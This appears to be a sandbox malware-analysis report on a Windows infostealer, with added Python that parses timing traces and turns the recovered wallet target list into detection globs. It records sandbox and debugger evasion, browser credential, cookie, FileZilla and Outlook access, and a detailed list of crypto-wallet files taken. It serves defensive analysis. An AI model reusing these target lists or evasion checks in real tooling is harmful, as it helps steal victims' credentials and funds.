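        if insn.mnemonic in STACK_SHUFFLE or insn.mnemonic in ("jmp", "rdtsc"):
            continue
        kept.append(insn)
    return kept


def executed_bytes(listing):
    """Bytes executed from the first rdtsc through the second (rdtsc is 2 bytes).
    Offsets accumulate along the trace, so this is not second - first address."""
    return listing[-1].offset - listing[0].offset + 2


def summarize(lines):
    rows = []
    for rec in map(parse_report_line, lines):
        eff = effective_instructions(rec.listing)
        rows.append((rec.first, rec.second, executed_bytes(rec.listing),
                     [f"{i.mnemonic} {i.operands}".strip() for i in eff]))
    return rows


if __name__ == "__main__":
    for first, second, nbytes, eff in summarize(SAMPLE_LINES):
        print(f"{first:08X}->{second:08X} {nbytes:3d} bytes executed, "
              f"effective: {eff or 'none (pure timing window)'}")
```

A trace whose effective list is empty or a couple of register moves is a timing window: the delta between the two reads is what is being measured, and a single-stepping debugger or an emulator that makes rdtsc expensive will fail it. The third trace shows the same checks bracketing real code (epilogue, compare, call), which is why a sandbox intercepts rdtsc itself rather than patching individual sites.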
Source: C:\Users\user\Desktop\random(1).exe Special instruction interceptor: First address: ECF924 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(1).exe Special instruction interceptor: First address: 110955D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe TID: 7636 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C59EBF0
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: random(1).exe, 00000000.00000002.2013235084.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\random(1).exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\random(1).exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe File opened: NTICE
Source: C:\Users\user\Desktop\random(1).exe File opened: SICE
Source: C:\Users\user\Desktop\random(1).exe File opened: SIWVID
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C66AC62
Source: C:\Users\user\Desktop\random(1).exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C6B4760
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6C591C30
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: QProgram Manager
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66AE71 cpuid 0_2_6C66AE71
Source: C:\Users\user\Desktop\random(1).exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6C66A8DC
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B8390 NSS_GetVersion, 0_2_6C5B8390

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsonq
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus\exodus.wallet
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonK+
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D54000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
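The pipe-delimited string recovered from memory above is the stealer's wallet target list: five fields per record, name | base-directory selector | relative path | file mask | flag. The Python below is an added example, not code from the report or from the malware. It parses that string (copied from the report; its first record is cut off in the dump and is kept as a nameless entry), reproduces the path join that yields the doubled-backslash open-file strings seen in the dump (C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json), and expands the list into globs that can be matched against file-open paths from an EDR or Sysmon event. Selector 1 resolving to the Roaming profile is confirmed by the resolved strings in the dump; selector 2 resolving to the user profile root, and the last field being an unexplained per-target flag, are assumptions of this example.

```python
"""Parse and expand the wallet target list recovered from memory."""
import fnmatch
from collections import namedtuple

Target = namedtuple("Target", "name base relpath mask flag")

# Copied from the string the report recovered at 0x00D04000. It starts mid-record:
# the name of the first entry did not survive in the dump.
TARGET_BLOB = (
    r"1|\Blockstream\Green\wallets\|*.*|1|"
    r"Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|"
    r"Ethereum|1|\Ethereum\|keystore|0|"
    r"Electrum|1|\Electrum\wallets\|*.*|0|"
    r"ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|"
    r"Exodus|1|\Exodus\|exodus.conf.json|0|"
    r"Exodus|1|\Exodus\|window-state.json|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|"
    r"Electron Cash|1|\ElectronCash\wallets\|*.*|0|"
    r"MultiDoge|1|\MultiDoge\|multidoge.wallet|0|"
    r"Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|"
    r"Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|"
    r"Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|"
    r"Binance|1|\Binance\|app-store.json|0|"
    r"Binance|1|\Binance\|simple-storage.json|0|"
    r"Binance|1|\Binance\|.finger-print.fp|0|"
    r"Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|"
    r"Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|"
    r"Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|"
    r"Ledger Live|1|\Ledger Live\|*.*|0|"
    r"Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|"
    r"Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|"
    r"Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|"
    r"Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|"
    r"Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|"
    r"Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|"
    r"Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|"
    r"\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)

# Base-directory selector. '1' -> Roaming profile is confirmed by the resolved paths
# in the dump; '2' -> user profile root is an assumption (it is where \.chia\ lives,
# and the dump resolves no '2' entry).
BASES = {"1": r"C:\Users\user\AppData\Roaming", "2": r"C:\Users\user"}


def parse_targets(blob):
    fields = blob.split("|")
    if fields and fields[-1] == "":
        fields.pop()                       # trailing delimiter
    lead = len(fields) % 5
    records = []
    if lead == 4:                          # leading record lost its name in the dump
        records.append(Target("<truncated>", *fields[:4]))
        fields = fields[4:]
    elif lead:
        raise ValueError("blob does not align to 5-field records")
    for i in range(0, len(fields), 5):
        records.append(Target(*fields[i:i + 5]))
    return records


def raw_join(t, bases=BASES):
    """Join the way the stealer appears to (base + '\\' + relpath + '\\' + mask).
    Reproduces the doubled backslashes seen in the dumped open-file strings."""
    return bases[t.base] + "\\" + t.relpath + "\\" + t.mask


def normalized_glob(t, bases=BASES):
    s = raw_join(t, bases)
    while "\\\\" in s:
        s = s.replace("\\\\", "\\")
    return s


def hunt_globs(records, bases=BASES):
    return sorted({normalized_glob(t, bases) for t in records})


def match_event_path(path, records, bases=BASES):
    """Map a file-open path from an EDR/Sysmon event to the target it hits.
    Strips the \\??\\ NT prefix the report shows on some strings. fnmatch '*'
    also crosses backslashes, so '*.*' masks match files in subdirectories."""
    p = path[4:] if path.startswith("\\??\\") else path
    for t in records:
        if fnmatch.fnmatchcase(p.lower(), normalized_glob(t, bases).lower()):
            return t
    return None
```

The doubled-backslash form is worth keeping as its own indicator: it is the string the stealer builds in its own buffer before the open, so it shows up in memory dumps and string scans, while the \??\ form is the normalized NT path and is what file-system telemetry records.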
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670C40 sqlite3_bind_zeroblob, 0_2_6C670C40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670D60 sqlite3_bind_parameter_name, 0_2_6C670D60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C598EA0 sqlite3_clear_bindings, 0_2_6C598EA0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C670B40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C596410 bind,WSAGetLastError, 0_2_6C596410
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6C59C050
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C596070 PR_Listen, 0_2_6C596070
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59C030 sqlite3_bind_parameter_count, 0_2_6C59C030
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5960B0 listen,WSAGetLastError, 0_2_6C5960B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5222D0 sqlite3_bind_blob, 0_2_6C5222D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5963C0 PR_Bind, 0_2_6C5963C0